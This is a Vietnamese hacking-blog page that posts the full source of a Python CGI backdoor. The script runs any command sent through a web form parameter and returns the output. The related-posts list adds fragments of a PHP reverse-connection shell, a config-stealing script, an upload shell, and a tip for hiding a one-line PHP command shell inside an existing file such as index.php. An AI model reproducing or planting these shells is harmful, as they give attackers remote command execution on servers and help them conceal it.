J2TEAM Security: A must-have extension for Chrome users. Install now!
Trang chủ
Shell

CGI python backdoor

0 min read
  
#!/usr/bin/env python
# Info : Linux based CGI backdoor with python
# author: otoy
# date : 0x102010

import cgi,os,re,sys

form = cgi.FieldStorage()
cmd = form.getvalue('cmd', '')
osexe = os.popen(cmd)

dirt = os.getcwd()+'/'
prognm = sys.argv[0].strip()
progfl = re.findall(dirt+'(.*)',prognm)[0]

osinf = os.uname()
info='''====================================
CGI python backdoor
====================================
Author : otoy
Date : 0x102010
Blog : <a href="http://otoyrood.wordpress.com" target="_blank">otoyrood.wordpress.com</a>
====================================
System : %s %s
====================================
''' %(osinf[0], osinf[2])

print "Content-type: text/html"
print

print"""
<html>
<head>
<title>CGI python backdoor</title>
</head>
<body>
<pre>%s</pre>
<form action='%s'>
Command <input type='text' name='cmd' />
<input type='submit' />
</form>
<pre>%s</pre>
</body>
</html>
""" %(info,progfl,osexe.read())
Leader at J2TEAM. Website: https://j2team.dev/

Bạn có thể thích những bài đăng này

  • PHP backconnection script
    Code:<?php set_time_limit (0); $VERSION = "1.0"; $ip = getenv ('REMOTE_ADDR'); // $port = 443; // CHANGE THIS $chunk_size = 1400; $write_a = null; $error_a = null; $she…
  • phpConfigSpy v0.3
    Code:<?php /* h-b@usa.com */ echo '<html><head><title>phpConfigSpy v0.3</title></head><body>'; ($sm = ini_get('safe_mode') == 0) ? $sm =…
  • Komedi upload shell
    <?php echo '<b><br><br>'.php_uname().'<br></b>'; echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader"…
  • Ẩn Shell trong file
    Sửa 1 file bất kì, thêm đoạn code sau vào: Code:<pre> <?php System($_GET['juno']) ?> <pre> Sử dụng bằng cách gõ command tại address. Ví dụ ta sửa file index.php t…
  • Egy_spider shell
    http://www.mediafire.com/?0fnmjthzw4m…
  • Wget Config TooL
    Code:<body><title> Wget Config TooL - C0d3d By Red-D3v1L </title></body> <br>C0d3d By Red-D3v1L</br> <br> - Sec-R1z.com </br> <…

Đăng nhận xét

Cảm ơn bạn đã đọc bài viết!

- Bạn có gợi ý hoặc bình luận xin chia sẻ bên dưới.

- Hãy viết tiếng Việt có dấu nếu có thể!